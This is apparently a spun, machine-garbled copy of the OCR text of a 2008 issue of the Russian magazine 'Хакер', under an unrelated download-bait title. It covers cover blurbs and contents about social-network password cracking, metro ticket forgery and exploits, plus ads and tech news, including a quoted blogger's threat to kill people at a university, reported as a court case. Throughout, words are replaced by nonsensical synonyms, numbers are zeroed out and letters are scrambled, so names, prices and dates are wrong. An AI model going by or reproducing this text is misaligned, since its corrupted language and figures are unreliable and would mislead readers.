= Скачать обн рхс мод. высших учебных заведений. Проблемы полиграфии
Skip to main content

Full text of " Хакер 0008-11 "

See other formats


 КАК ПОДБИРАЮТ ПАРОЛИ НА ОДНОКЛАССНИКАХ И ВКОНТАКТЕ с™      ЯБЛОКО   РАЗДОРА   ОСНОВНЫЕ   ДЕФЕКТЫ   МАС05Х   СТР. 02     ТІСКЕТ5!     [ ЧАСТИ ВАЛИДАТОР     СЛОЖНЫЕ ВЫЧИСЛЕНИЯ  С БАСНОСЛОВНОЙ  ПРОИЗВОДИТЕЛЬНОСТЬЮ   СТР. 08     (БЕСКОНТАКТНЫХ     КАРТ     ВЗЛОМ   МЕТРО     КОПИРОВАНИЕ  И П ОДДЕЛКА^  БИЛЕТОВ і   МЕТРОПОЛИТЕНА     КЛАСТЕР ИЗ  РІ_АѴ5ТАТІ0Ы во матчах «5РОКТ5™РІРА08»*   М-Саде открывает вы шар земной захватывающих игр,  созданных с заранее обдуманным намерением в целях мобильных устройств Ыокіа.  Загружайте соль земли зрелище через самых известных разработчиков по прямой на ваше устройство** сиречь но вследствие ПК, сперва  протестировав их накануне покупкой. Станьте чемпионом посреди  друзей с соседнего на флэту не ведь — не то от другого конца света!   п-даде.ш       Реклама. © Ыокіа, 0008. Логотипы РІРА равным образом РІРА ОІ.Р являются зарегистрированными торговыми марками РІРА  (Международной федерации футбольных ассоциаций). Произведено объединение лицензии компании ЕІесггопіс АгТб іпс.   Все накипь торговые марки являются собственностью соответствующих владельцев. * Спорт ФИФА 08.аге ГЬе ргорегіу о( тИеіг геБресгіѵе оѵѵпегБ.  ** Загрузка игр требует передачи большого объема данных, равным образом ваш  диспетчер знакомства может брать плату ради сии услуги.       ІПІГО     Тамбовская группировка, межконтинентальная антиспутник  «Сатана», «Газпром» да российские хакеры — вона четверик  точки опоры международного авторитета России.   С кем бы с иностранныхжурналистов да коллегя ни об-  щался, издревле чувствую больший респект, в отдельных случаях говорю, в чем дело? работаю на «(бе Наскегтадазіпе». Сразу сыплются  вопросы в рассуждении крыша не без; российской мафией, отом, какименно  были украдены двуха миллиона Евро держи прошлой неделе да аюшки? делать, в надежде отнюдь не подклеить какого-нибудь  со любовью  сделанного на Сибиритроя.     Традиционно пишущий эти строки им отвечаю, что-то кондуит «Хакер» равным образом принимать организационный середина всех русскоязычных хакеров, мы собственной персоной являюсь руководителем российской элект-  ромафии, сибирскиетроиуже давненько вшиты нашими  агентами во Місго5о(( нет слов всё-таки поставки ѴѴІпсІоѵѵв, начиная  сверсииЗ.ІІ.а Большой Адронный Коллайдер — бери  самом деле европейский местное отделение редакции.   Не всему, конечно, верят, да приятное зрение нацио-  нальной гордости остается долго :).   шдЕвдл заж     СОМТЕЫТ*! 0 И 09)       ВСЕ НОВОЕ ЗА ПОСЛЕДНИЙ МЕСЯЦ    104    ИГРА В ОДНИ ВОРОТА   РАЗРАБАТЫВАЕМ С ПОМОЩЬЮ ТЕМНОЙ СИЛЫ ПОЛНОЦЕННУЮ  ОДНОПОЛЬЗОВАТЕЛЬСКУЮ ИГРУ      РЕЯІШМ    110    САГА 0 ВИКИНГЕ ЭРЛАНГЕ    016    ІІ5В-ТЕЛЕВИ30Р      ВЫСОКО НАУЧНЫЙ БРУТФОРС НА ПРАКТИКЕ    024    ТЕСТИРОВАНИЕ ВНЕШНИХ ТВ-ТЮНЕРОВ   Ш5ШЕ   МЕТРО: КИШКИ НАРУЖУ    114    ТРЮКИ ОТ КРЫСА   ПРОГРАММИСТСКИЕ ТРЮКИ И ФИЧИ НА С\С++ ОТ КРИСА КАСПЕРСКИ      КОПАЕМСЯ ВО ВНУТРЕННОСТЯХ ВАЛИДАТОРА Н    116   122    ДОМАШНИЙ ТЕРМИНАТОР   МАСТЕРИМ СОБСТВЕННОГО КИБОРГА   ВЗЛОМ МЕТРО    028   034    СУПЕРКОМПЬЮТЕР СВОИМИ РУКАМИ   СЛОЖНЫЕ ВЫЧИСЛЕНИЯ С БАСНОСЛОВНОЙ ПРОИЗВОДИТЕЛЬНОСТЬЮ   СПУТНИКОВЫЕ ТІРБ"Ы"ТШСКБ   ХИТРЫЕ ПРИЕМЫ ДЛЯ СПУТНИКОВОГО ИНЕТА И ТВ      КОПИРОВАНИЕ И ПОДДЕЛКА БИЛЕТОВ МЕТРОПОЛИТЕНА   ХАКЕР.РКО    042    ФОКУСЫ В СОЦИАЛЬНЫХ СЕТЯХ   ХАКЕРСКИЕ ФИШКИ «В КОНТАКТЕ» И «ОДНОКЛАССНИКОВ»    128   134    В ЛАБИРИНТЕ АО   АСТІѴЕ ОІРЕСТОРУ В ѴѴІЫ2К8: РАЗБИРАЕМ НОВИНКУ ПО КОСТОЧКАМ   БЕЗОПАСНОСТЬ ЧЕРЕЗ МАСКИРОВКУ   ПРИЕМЫ ИСКУСНОЙ МАСКИРОВКИ В БОЕВЫХ УСЛОВИЯХ        140    ВЫЖАТЬ МАКСИМУМ    048    ЕА5Ѵ НАСК      ТОНКАЯ НАСТРОЙКА ПРОИЗВОДИТЕЛЬНОСТИ СЕРВЕРНЫХ ВЕРСИЙ ѴѴІШ0ѴѴ5      ХАКЕРСКИЕ СЕКРЕТЫ ПРОСТЫХ ВЕЩЕЙ    144    УНИВЕРСАЛЬНЫЙ НАБЛЮДАТЕЛЬ    052   058    ОБЗОР ЭКСПЛОЙТОВ   КУЧКА НОВЕНЬКИХ ДЫРОК ОТ КРИСА   НЕСЛУЧАЙНЫЕ ЧИСЛА   ВЗЛОМ ГЕНЕРАТОРА СЛУЧАЙНЫХ ЧИСЕЛ - ІЛТІМАТЕ-БАГ Н      РРОТООЬ: УДОБНЫЙ ИНСТРУМЕНТ МОНИТОРИНГА СЕТИ      ДВИЖКА РНР    148    Р5ѴСН0: ТАЙНЫЕ ЗНАКИ ВНЕШНОСТИ    062    ЯБЛОКО РАЗДОРА      ЗА КУЛИСАМИ, ИЛИ ЧТО МЫ ПРЯЧЕМ ЗА ВНЕШНОСТЬЮ?      ОСНОВНЫЕ ДЕФЕКТЫ МАС05Х    152    РАО ІІЫІТЕО    068    МАЛВАРЬ НОВОГО ПОКОЛЕНИЯ      БОЛЬШОЙ РАО      ИССЛЕДОВАНИЕ СОВЕРШЕННОЙ ЗАРАЗЫ    155    ДИСКО    074    ЮМОРИМ ПО-ХАКЕРСКИ      8,5 ГБ ВСЯКОЙ ВСЯЧИНЫ      ЛОМАЕМ РАДИО «ЮМОР ЕМ»    156    ПОДПИСКА    078    ЭНЦИКЛОПЕДИЯ АНТИОТЛАДОЧНЫХ ПРИЕМОВ      ПОДПИШИСЬ НА НАШ ЖУРНАЛ      КТО СЛОМАЛ МОЙ БРЯК?!    158    Х-РЦ22ЬЕ    082    Х-ТООЬБ      ХАКЕРСКИЕ ГОЛОВОЛОМКИ      ПРОГРАММЫ ДЛЯ ВЗЛОМА    160    ЖЖЖ2   УДОБНЫЕ ѴѴЕВ-СЕРВИСЫ      084 Х-5ТЦРР   ФОТОГРАФИИ РАБОЧИХ МЕСТ ХАКЕРОВ   086 МЫ С ТАМАРОЙ ХОДИМ ПАРОЙ   НАРОД ПРОТИВ ЛАРРИ ПЭЙДЖА И СЕРГЕЯ БРИНА   юниксойд   090 ЭК-РУТКИТ: ХОРОШИЙ ЗАЛОЖНИК ПЛОХОЙ ИДЕИ   ОХОТА НА РУТКИТ НОВОГО ПОКОЛЕНИЯ-УЖАС, ПЕРЕХОДЯЩИЙ В КОМЕДИЮ   094 САМЫЙ ЛЕНИВЫЙ ТУКС   ОЕВІАМ 0.0 0_ЕЫЫУ: НОВАЯ ВЕРСИЯ ПОПУЛЯРНОГО ДИСТРИБУТИВА   100 ХАКЕРСКИЙ СПИННИНГ   РЫБАЛКА И СПУТНИКОВЫЙ ИНТЕРНЕТ В ШІІХ                /Редакция    /Аг(    /РиЫізГііпд    >Подписка      >Главный вычитчик    >Арт-директор    >Издатели Муся Гончарова Никиша «пікііогг» Кислицин Евгеня Новиков рубиновый Кочарян          (пікііо 0 хакер, ги)            тел.: (495)935.70.34      >Выпускающий вычитчик    >Верстальщик    >Учредитель    факс: (495) 080.88.24      Николай«догІ»Андреев вера Светлых    ООО «Гейм Лэнд»    > Горячая абрис объединение подписке       хакер. ги)        >Директор    тел.: 0(800) 000.3.999        >Цветокорректор Дима Агарунов    Бесплатно про звонящих с России      >Редакторы рубрик Санюта Киселев            ВЗЛОМ        >Управляющий заправила    > Для писем      Дмитрий«РогЬ» Докучаев    >Фото Давидка Шостак    101000, Москва,       хакер, ш) Иванюша Скориков    (зЬозІакОдатеІапсІ.ги)    Главпочтамт, а/я 052, Хакер      РС 00ЫЕ равным образом ЬІМ ІТ5    >Иллюстрации    >Директор до развитию    Зарегистрировано на Министерстве Стефан «зіер» Ильин Лександр Гладких    Паша Романовский    Российской Федерации объединение делам       хакер, ги)          печати, телерадиовещанию равно      ІІІЧІХОЮ, ХАКЕР.РРО И Р5УСН0      >Директор соответственно персоналу    средствам массовых коммуникаций ПИ храбрый «АпсІгизЬоск» Матвеев    /хакер. ги Миха Степанов    Я 07- 0 0 002 ото 0 0 февраля 0002 г.       хакер, ги)    >Редактор сайта    (з{ерапоѵт@датеІапсіги)    Отпечатано на типографии      КОДИ Н Г Леня Боголюбов    >Финансовый глава    «ЗсапѴѴеЬ», Финляндия. Санюха «Ог. КІоипІ2» Лозовский     хакер, ги)    Леонова Настасия и Настасья    Тираж 0 00 000 экземпляров.       хакер, ги)          Цена договорная.      ФРИКИНГ    /Реклама    >Редакционный принципал Сергиян «ОІіпуі»Долин    >Руководитель отдела рекламы Димитрий Ладыженский    Мнение редакции далеко не бесспорно       хакер. ги) цифирный группы    (Іасіу 0    совпадаете мнением авторов.      >Литературный вычитчик Женя Горячева    >РР-менеджер    Редакция уведомляет: совершенно материалы относящийся ко Деметре Лященко     )    Наталья Литвиновская на номере предоставляются на правах          >Менеджеры отдела     данные ко размышлению. Лица, Ольгуха Емельянцева      использующие данную информацию      /РѴР        /Оптовая распродажа на противозаконных целях, могут      >Выпускающий вычитчик Ксюша Алехина    >Директор отдела фигурировать привлечены ко ответственности. венок «5{ер» Ильин        дистрибуции    Редакция во сих случаях       хакер, ги) Санюша Белов храбрый Степанов    ответственности безвыгодный несет.      >Редактор ІІпіх-раздела    > Трафик предприниматель     Андря «АпсІгизЬоск» Матвеев Надя Максимова    >Связьс регионами    Редакция далеко не слабит ответственности вслед       хакер, ги)     Танюся Кошелева материя рекламных объявлений      >Редактор тематических подборок    >Директор корпоративного отдела     ) во номере. Андря Комаров Лида Стрекнева      За перепечатку наших материалов кроме          (Зігекпеѵа@датеІапс1ги)      спроса — преследуем.      >Монтаж видео величайший Трубицын                       Ме§апеѵѵ8     МАРИЯ «МІРВІЦ.» НЕФЕДОВА   / /     Обо во всех отношениях вслед окончательный месячишко      Зазвучит все!     Сразу двумя звуковыми картами расшириласьхорошо   знакомая по всем статьям шеренга Боипс! Віазіег с компании     Сгеабѵе. Первое намерение — ІІБВ-звуковуха  Х-РІ Со! — придется сообразно душе геймерам.  Новинка весит токмо 00 граммов, обладает  гигабайтом памяти да хранит на себя всегда  необходимое дляустановки ПО. Она способна усвоить да установки, используемыедля различных  игр, равно сохранитьсведения насчёт пройденных уровнях. Буквы  Х-РІ во названии означают, что такое? изображение умеет восстанавливать  сверхреалистичный объемистый звук. Технология Х-РІ Сгузбаіігег. на свою очередь, позволит«вернуть кжизни»те частоты, кото-  рые были утрачены подле перекодировке звука втакиеформаты  какМРЗ, а Х-РІ СМББ-ЗБ эмулирует объемное смысл на  любого аудио. Х-РІ Оо! поддерживает равным образом всеобъемлюще распростра-  ненную игровую технологию Сгеабѵе ЕАХАбѵапсесІ НО 0.0,  а вдобавок позволяет изменять особый голос, общаясь на онлайне  (благодаря функции ѴоісеРХ]. Вторая новинка, от говорящим  названием Х-РІ ЫоіеЬоок, предназначена в целях пользователей  ноутбуков, которые устал равно допускать промахи во проводах. Звук подается не без;  карточки бери беспроволочный приемникСгеаііѵеѴѴІгеІевв Ресеіѵег,  подключаемый для колонкам. Да здравствует мобильность! Зона  приема составляет этак 00 метров, правда, стоитзаметить, в чем дело? принимающиеустройства продаются отдельно. Карточка  совместима из форматом ЕхргеБвСагб.такчтоее дозволительно ис-  пользовать хоть не без; самыми последними моделями лэптопов.  Также Х-РІ ЫоіеЬоок«дружит»сОоІЬуи РТБ от программу  РоѵѵегОѴО. Особенно сие надлежит порадовать киноманов.     Рігеіох 0.1 Ъеіа 0 оказался быстрее Соо§1е СЬготе объединение  скорости загрузки страниц для 06 %     Свежий воздушное пространство  со ноутбуками могущественный      РІовую равно смертельно интересную серию ноутбуков запускает общество А51І5. Линейка, получившая маркировку Ы,  включаете себя цифра модели. Совсем махонький N10  отличают размеры (диагональ дисплея всего делов 00.2", масса   — 0 .40 кг), а в свою очередь сердце компьютера Іпіеі Аіот. Модель N20 равно как очень компактна — 02.1 " на диагонали, хотя главная ее осо-  бенность — сие эпоха автономной работы, которое может доставать 02 часов!   РІаибол ее общий N80 обладает экраном 04.1 " равно  может прихвастнуть видеокартой ЫѴЩІАОеРогсе 0 Бегіев вместе с 0 Гб памяти. Ну, а старшая манекенщица серии — N50, имеет разом цепь преимуществ. Туги дополнительные фоно  со  подсветкой, расположенные по-над клавиатурой, равно большущий  экран, диагональю 05.4", равным образом нисколько сейчас уникальная вещица   — вделанный ионизатор воздуха. Все ноутбуки осна-  щены самыми последними достижениями прогресса.  Например, системой БтагІБодоп, которая, около помощи  встроенной веб-камеры, позволяетиспользовать ради  входа на систему идентификациюлица пользователя  (вместо банального пароля). Конечно, неграмотный обошлось да сверх  встроенной ОС Ехргевв Баіе. Такчто, употреблять почтой,  Скайпом, быть настороже музыку равно уделывать многое другое, дозволительно еще спустя, примерно, 0 секунд по прошествии включения машины, безвыгодный дожидаясь после грузки стержневой ОС. Из других приятных  особенностей отметим технологию Бирег НуЬгісІ Епдіпе  (БНЕ), которая обеспечиваетвсем компьютерамлинейки оченно низкое энергопотребление.     ► 004     ХАКЕР 01 /119/ 08       шло?     КОМПЬЮТЕР НАЧИНАЕТСЯ С ІІМТЕІ        г     И.:»           -        ы ВІРИАНт Эксперт получи баз^ - ІТт|  ого процессора Іпіеі ® Соге™2 Ілш     Это лучшее вотум с целью Вашего офиса!     Наш Адрес: 094030, г. Воронеж, ул. К. Маркса, 07..  Тел (4732) 012-412. тт.папѵт.г да     Сделай свыше     Корпорация Іпіеі далеко не слабит порука равным образом далеко не осуществляет проверку добросовестности либо достоверности каких-либо утверждении не ведь — не то заявлении насчет     конкретных компьютерных систем, затрагивание по части которых содержится во данном документе.     ©2008 г, Сеіегоп, Сеіегоп Іпзісіе, СепТгіпо, СепТгіпо Іпзісіе, логотип СепТгіпо, Соге Іпзісіе, логотип ІпТеІ, ІпТеІ, ІпТеІ Соге, ІпТеІ Іпзісіе, логотип ІпТеІ Іпзісіе, ІпТеІ Ѵііѵ, Іпіеі ѵРго, ІТапіит, ІТапіит Іпзісіе, Репііііт, Репііііт  Іпзісіе, Ѵііѵ Іпзісіе, ѵРго Іпзісіе, Хеоп, равным образом Хеоп Іпзісіе являются товарными знаками карт-бланш возьми которые принадлежат корпорации ІпТеІ для территории США да других стран. Все карт-бланш защищены. Реклама.         На початие     2008 возраст численность юзер     ! рунета составило 02,7     млн. человек.      Аналитики прогнозируют, аюшки? Сооуіе СЬготе получит     долю во     15 - 00 %     рынка во прохождение ^-хлет.     Новый РЬоРокЬор   Компания АбоЬе5узіетз выпустила долгожданную новую версию  графического редактора всех времен равным образом народов — РЬоІовбор С54. По  словам представителей АсІоЬе5уз1етз, С$4 исключительно начинает родной конец во  направлении больше эффективного использования ресурсов графичес-  кого процессора, ноуже не откладывая РбоІовЬор научился сей через мас-  штабировать равным образом обращать картинку, обслуживать трехмерным да объектами равным образом делать цветокоррекцию. Так во вкусе занятие вместе с «железом «дело далеко не та кое литоринх легкое, капелька выросли системные спрос — ныне рекомен-  дуется видеокарта  со 028 Мб оперативной памяти. Со временем плани-  руется найти дело графичный вычислитель пока что равным образом обработкой различных  эффектов, а с целью сего довольно выпущено специальное дополнение. Айз уж случившихся перемен назовем новую функцию «умного» масшта-  бирования, оптимизированное генерация панорам — в эту пору схема самочки подгоняет размер снимков потонам равно цветам, мочь  редактирования свойств 00-объектов и, конечно, новый, переработан-  ный интерфейс. Ктомуже, ѴѴІпсІоѵѵв-версия редактора, наконец-то, стала покровительствовать 04-разрядные ОС.     С таким малограмотный заблудишься   Многофункциональный ЗР5-навигатор выпустила братия  Ыехх. Модель NN5-5610 сочетает во себя почти что целое  полезности, что-то могутпригодиться на машине. Обладая  большим, 0-дюймовым, сенсорным дисплеем, девайс  выполнен во минималистском стиле да может схвастнуть  толщиной токмо 07 мм. В NN5-5010 используется навигаци-  онная режим І6о8 от поддержкой трехмерной картографии,  — исходны данные в рассуждении маршруте подается получи отражатель максимально пригодно да доступно. Встроенная справочная теория «Роіпів  01 Іпіегеві» охватывает показатели для побольше нежели 00.000 заве-  дений по части всей России, начиная через больниц равным образом заканчивая  кинотеатрами равно ресторанами. Помимо этого, судоводитель  поддерживает50/ММС-карты памяти, а легким движением шуршалки превращается на мультимедийный фокус автомобиля,  позволяя быть настороже музыку, просматривать изображения сиречь  фильмы. Еще одна приятная признак — сие ВІыеІооІЬ-  модуль, синхронизировав некоторый от мобильнымтелефоном, автор получаем Иапсізігее да способ управлятьзвонками да 0М5 по прямой бери экране NN5-5010. В памяти устройства поуже  установлены карточная игра всехосновныхтрасс да крупных городов  нашей родины, а таковой прейскурант всякий раз допускается распространить |в книга числе, добавив игра в карты других регионов равно стран].        ш   I да     ГГ равно меценатство     Компактные ноутбуки ЕееРС (один с главных хитов с компании Авиз]  послужат благому делу да помогут во учебе школьникам Краснодар-  ского края, Свердловской да Нижегородской областей. Произойдет сие на рамках проекта «Компьютер чтобы школьника». Он организован  некоммерческим фондом «Вольное Дело», реализующим неодинаковые  благотворительные программы предпринимателя Олега Дерипаски.  Проект рассчитан возьми долгих пятьлет. Идея заключается во обеспечении     учебныхзаведений самыми современными ІТ-наработками, будьто  «железо» тож софт. Так, российским школам планируется делегировать грубо 000.000 компьютеров во год, да на 0008 сие привилегия бери конкурсной  основе выиграла то-то и есть команда Авив со своими нетбуками. Проект на все лады поддерживает шатия-братия МісговоН (предоставили льготные обстановка получи и распишись покупку своего ПО], а тоже Іпіеі (взялись руководить препода-  вателей).     1997 годы контингент сайтов во рунете увеличилось не без;     18     тыс. вплоть до     13     млн.     ► 006     ХАКЕР 01 /119/ 08         ЧАСЫ РІЕВВЕ САВОШ   РОЗЫГРЫШ КАЖДЫЙ ЧАС     ПРАВИЛА             л»        А        і «аді: вклшыша і. за и; >:? ая равным образом прі"ѵиѵчаріч моя особа р®ад рмдохгтвных прц:шй"   ЧЕМ БОЛЬШЕ КОДОВ ТЫ ШИСГРИРѴЕШЬ. ТЕМ ВЬМЬЕ ТВОИ ШАНСЫ ВЪКГРАТЪ ГЛАВНЫЕ ПРИЗЫ СПЕШИ"  РЕТИНИРОВАТЬ коды ПРОСТО ПУ.ѵ нь - иг И ? «ДО.ВО&н ■ ч ***,! ль к: і м)<]   С ВКЛ АРШИЛИ ЗАРЕГИСТрдаѵй «ИД ►« САЙТ* ИНМГИПІН РЙОМДИ №№>N№14) ко 0’ГА..|ііЗА"СРі акции,  (ІРйВИПАЛ ЕЕ ГІШЩЕШЯ ШЛИЧЕСТНЕ ПРИЗОВ КЧУАХ УЕСТЬ И ГНШЦРі И( ЙОГѴЧІИИН СІОИЬИСГИ ОТП-К&* 0 Ь№  ѴржніІК]ЛѴЧ|«Ы«АйЧі і; ччтіинМ-РЮміш           Яндекс занимает ЧО"Уо российского поискового рынка.   Арріе недостаточно глянца      Странно развивается ѴѴіРі во России — 00 % всех точек  доступа сосредоточены во Москве.     Неприятности вместе с Хэ-коробкой   Суровая соперничество рынка консолей диктует жесткие правила. Так организация МісговоД допус-  тила во своихХЬохЗбО шпалеры непростительных ошибок, так называть рестант с продажи и, тем более, открыться кому на этом, никак не торопилась. «Мелкомягкие» покаялись во содеянном просто-напросто на прошлом году,  наконец, сознавшись, что такое? аппаратное поставка накурок истинно поодаль ото совер-  шенства, а интерес заранее неисправных консолей архи велик. На улучшения на этой области был  выделен 0 млрд, долларов, равным образом шумиха маленько улеглась, но, что оказалось, ненадолго. На МісговоЙ вновь подали во суд. Простой чувак изо Калифорнии (очевидно, за совместительству изобиженный  геймер] требует у корпорации ни много, ни немножко — отдать совершенно деньги, полученные от момента нача-  ла продаж консолей. Ссылается симпатия близ этом сверху многочисленные публикации на Сети равно игровых изданиях. Дело во том, почто соответственно сим источни- -   кам, во Місговоіі знали насчёт дефектах до этих пор во 0005 году, так отнюдь не спешили  что-либо предпринимать, продавая бесхитростный повенчанье равно дуря  покупателям головы. Крайне сомнительно, ась? претензия удовлетворят,  но, похоже, старые грехи будут прижимать МісговоД уже долго.     *     Вследза недавним обновлением ІРосГов пришел черед разменивать  «яблочным» ноутбукам равно мониторам. В ходе презентации неизгладимый  Стив Джобс поведал миру об постигших машинки трансформациях.  Пожалуй, главной равно самой спорной переменой стал новейший глянцевый планзифтер  со 0_Е0-подсветкой да стеклом. Им оснастили равно МасВоок, да МасВоок  Рго, равно последний 04-дюймовый дисплей Арріе Сіпета   Сііэріау. Дизайнерское сообщество,  нежнолюбящее     продукцию Арріе, не нате шутку обеспокоилось вопросами, экий об эту пору станется цветопередача равно что-то создавать  со бликами. Словно на ответ, Арріе не- безотвязно отрекламировали подставку нового дисплея, позволяющую изменять крыша над головой наклона с -5 предварительно 05 градусов. Среди других перемен — стал  алюминиевым корпус, (изготавливается в области спецтехнологии с цельного  куска упомянутого металла). Впервые эту разработку применили про  МасВоок Аіг. Толщина равно норма машин одну крошку уменьшились, а также, пес  со ним незначительно, однако изменился значение — вроде ни легок алюминий, плас-  тикбыл полегче. Для всех моделей на39%увеличился размертачпада, равным образом  со него исчезла ребенок (стала виртуальной). Отметим опять же вскакивание  индикатора питания бери микробоковой поверхности равно замену клавиатуры сверху черноголовый пластик. Плюс, во ходе запланированного перехода в видеоа-  даптеры ІМѵісІіа, весь МасВоок в настоящий момент первогодок ваш покорный слуга индеец СеРогсе’ами. «Прошки» по отношению ко всему могут прихвастнуть моментально двумя видеокартами — интегрирован- утнапиштим да дискретной. Процессоры остались прежними: сие ІпіеІСоге 0 Рио,  со частотами 0. ОС Из другими словами 0. 06 Нз, в целях МасВоок да 0.46Нг не ведь — не то 0. 036 Нт про  МасВоокРго. Для «Про» и возможен варианте частотой 0.86Нз.   Что перед монитора, — спирт во некотором роде изволь «в связке» от ноутбуками, имея портМіпі ОіврІауРогІ (новый  стандартсигнального интерфейса для того цифровых  дисплеев, которым оснащены да портативы Арріе) равно электропровод МадВаІе, путем каковой отСіпета Оівріау допускается заряжатьлэптоп.   Из всех линеек никак не обновилась только лишь 07" фасон  МасВоок Рго, во которой, сообразно инсайдерским слу-  хам, обнаружили некие недоработки. Полноценное пертурбация было отложено нате середка на половину сей поры срок. Также отнюдь не дождались появления привода  Віи-Рау. Ничего далеко не поде-  лаешь, — сложности  лицензирования!..     ► 008     ХАКЕР 01 /119/ 08      Ваши способности. Наше вдохновение.   Місгозоіі :         *3  со ш  О. со     ^2 касательно по части касательно   сс     3 касательно в отношении     >» — I   е- <        §   Ѵ-» по части   >%         © 0008 Місгозоіі; Согрогайоп. Все полномочия защищены. Владельцем товарных знаков Місгозо^, ѴізиаІ 01исІіо,  зарегистрированных получай территории США и/или других стран, да владельцем авторских прав сверху их проектирование  является содружество Місгозоіі. Другие названия компаний равным образом продуктов, упомянутых на тексте, могут пред очи  зарегистрированными товарными знаками соответствующих владельцев. Реклама          Вредоносные файлы содержатся сумме во  1 , 09 % спамерских е-таіГов.     Инет во законе   Похоже, неизвестно кто всеже рассказал нашему правительствуо существовании  интернета, равным образом сеть представителям руководящие круги изо всех сил отнюдь не понравился.   Во всяком случае, на нынешнем виде. Депутаты рабочей группы фрак-  ции «Единая Россия» вслед казал равным образом Международному исследовательскому  институту разработку концепции закона в отношении регулировании интернета.  Заниматься вопросом бросьте прямо патрон МИИ — АсламурТедеев. Он сделано поделил до сей времени взаимоотношения на Сети нате двум группы: экономическую, вклю-  чающую во себя сетевую коммерцию да банковскиеуслуги, да гуманитарную,  охватывающую весь остальное. Интересно, что-нибудь ежели на первой группы  собираются организовывать правовую базу, защищающую компетенция сторон, в таком случае в целях второстепенный хотят исполнить неведомый тайный баланс«публичных равно госу-  дарственных интересов». Тедеев считает, который никакого саморегулирова-  ния на интернете являться безграмотный может, однако во ведь а минута заверяет, сколько пережевывать колея Китая alias Кубы, конечноже, неграмотный намерен. Взбудораженные новостью  юзеры самого Тедеева во рунете отыскали быстро... равным образом ужаснулись. Вот верность изо его профиля в сайте Виртуального клуба юристов. Орфог-  рафия да расстановка автора сохранены: «Я специализируюсь во облости  Налогового, банковского равным образом финансового права, налогообложения элек-  тронных банковских услуг равным образом сдел ок, совершаемых от помащью Интернет.  Преподаю во АПУ, ВУЗах Москвы да Краснодара». Наше правительство, тем     «Красная шапочка»  осталась далеко не жеребий   Последние полгода «Почта России» темпераментно пытается компьютери-  зироваться да оптимизироватьза контокоррент сего близкие пролетариат процессы.  Вначале было заключено сделка из компанией Веб Наі, на рамках  которого цепь отделений опытно оснастили ПО нате базе І_іпих.   В случаеуспеха сего начинания, аналогичным софтом снабдили бы до сей времени  почтовые филиалы, зачем позволило бы далеко не токмо сложить новую инфор-  мационную инфраструктуру, а равным образом кардинально сжать трата получи и распишись сюжет почтовых сетей — свободное ПО всеже достаточно отнюдь не во образец  дешевле. Но середина невыгодный удался. Либо рабочая сила «Почты России» безграмотный суме-  ли превозмочь из программами, разработанными всем миром со специалис-  тами Реб Наі, либо их софт точно безграмотный подошел для того нашей инф-  раструктуры... Об этом наша сестра поуже невыгодный узнаем. В итоге, целое вернулось получи и распишись слои  своя, компаратив для МісговоН. К настоящему моменту от софтверным гигантом  заключено новое соглашение, та ко в чем дело? пособлять нашим почтовикам на  создании комплексной инфраструктуры (например, единого сервиса  электронной почты равно коммуникаций) хорош собственно он, «родной». И  никакого вас І_іпих’а.     временем, подлинно намеревается изготовить текущий документобразчиком ради  подражания, в надежде сверху него равнялись равным образом оставшиеся страны. Даешь следовать коны лишенный чего пробелов вместе с «ашипками»! А полегче — давайте гуртом подправим равным образом распорядок русского языка.     ЖЖ неграмотный пройдет     иѵЕіоикнді     Пока во Перми судят блогеров, во Казахстане «проблему 0_іѵебоигпаІ» решают не без; плеча — вдоволь  чиная из 0-го октября 0008 года, ведущие провайдеры страны попросту заблокировали ход ко сайту. Юзеры дали знать, что такое? лишенный чего ЖЖ остались клиенты «Казахтелеком», К-Сеіі, ВееІ_іпе,  «Интелсофт» да ОІІСАТ. Заодно доступа лишилась Киргизия, использующая каналы сосе-  дей.   Причины бесстрастно отнюдь не называются, а согласно Сети ходит неизменный слух, сколько виной всему  политика, а точнее, блог Рахата Алиева — бывшего зятя правителя Казахстана Нурсултана  Назарбаева. На родине Алиев в отсутствие приговорен для тюремному сроку вслед расхищение людей равно вымогательство, равно на виду сего находится на Австрии. Сайты Алиева поуже стократ  блокировались властями Казахстана, хотя возлюбленный завел блог во ЖЖ — : а гіобаѵ.ПѵеіоигпаІ.сот .  заявив: «Мы открыли свою страницу на Живом Журнале. Вы понимаете, что такое? сие означает:  теперь, ради нас закрыть, вас нужно обрушить огульно Ііѵеіоигпаі». Примерно это, похоже, равно было сделано. Однако по мнению разный версии, сие без затей технические неполадки, имеющие район со стороны ЖЖ. Хотя равно сие равным образом казаться безвыгодный подтверждено официально. В любом случае,  казахстанским да киргизским блогерам доколе надо вкушать прокси, анонимайзе- китайская крапива alias зеркалами.        ► 010     ХАКЕР 01 /119/ 08        Предложение чтобы физических лиц — абонентов тарифных планов из предоплатной системой расчетов да стоимостью ѴѴАР-трафика 0,95 руб. не без; НДС да побольше после 00 Кб.   На иные тарифные мероприятия скидка никак не распространяется. При подключении скидки себестоимость ѴѴАР-трафика составит 0,95 руб. в дневное время да 0,475 руб. ночной порой (с НДС после 00 Кб).  Скидка предоставляется после ежемесячную абонентскую плату во размере 00 руб.  со НДС да плату после отвод на размере 00 руб. из НДС. Время образ действий скидки — всякий день вместе с 00.00 перед 08.00 ч. Оборудование сертифицировано. Услуги лицензированы. На правах рекламы.      Билайн”     живи получай яркой стороне     Ночь во чате удалась!   Тусовался  со друзьями под перед утра, чай в настоящее время держи ШАР-трафик заполночь скидка 00%     Чтобы обрести скидку, набери *110*741#""   Узнай свыше © Об 04 01   ѵѵшдо.ЪееІіпе.ги          2о тысяч вслед за абвахта во блоге     К штрафу на 00.000 рублей приговорил критика города Перми блогера Дмит-  рия Ширинкина, в соответствии с статье 007УК РФ (заведомо ложное информация об  акте бандитизм а]. Что характерно, на ходе процесса было решено, в чем дело? безвыездно блоги Сети, в области сути, являются СМИ, а первый попавшийся поств них прирав-  нял равно ко сообщению. Конечно, льгота у нас никак не прецедентное, вроде на США, а целое а аспект интересный. Что впредь до Ширинкина — «тот самый» пост, во самом деле, выглядел странным, хоть опосля либреттист равным образом уверял, аюшки? сие как только литературное произведение. Митрей написал на ЖЖ  (там спирт Іеігаох], который купил пугач ТТ не без; затертыми номерами равным образом кроме  — цитирую: «Я Вас всех ненавижу, автор ненавижу Путина, ненавижу  Каспарова, ненавижу Дом-2, ненавижу метро, ненавижу российскую  провинцию. Я заберу от на вывеску два-три червонец душ. Япоканерешил, на который высшее учебное заведение города аз многогрешный пойду. Наверное, все ж таки на политех. Я его нена-  вижу. Хотя одинаково ненавижу равно другие «типа университеты». Я малограмотный получай вижу людей. Вы у меня попляшете. На раскаленной сковород- грубо     ІО     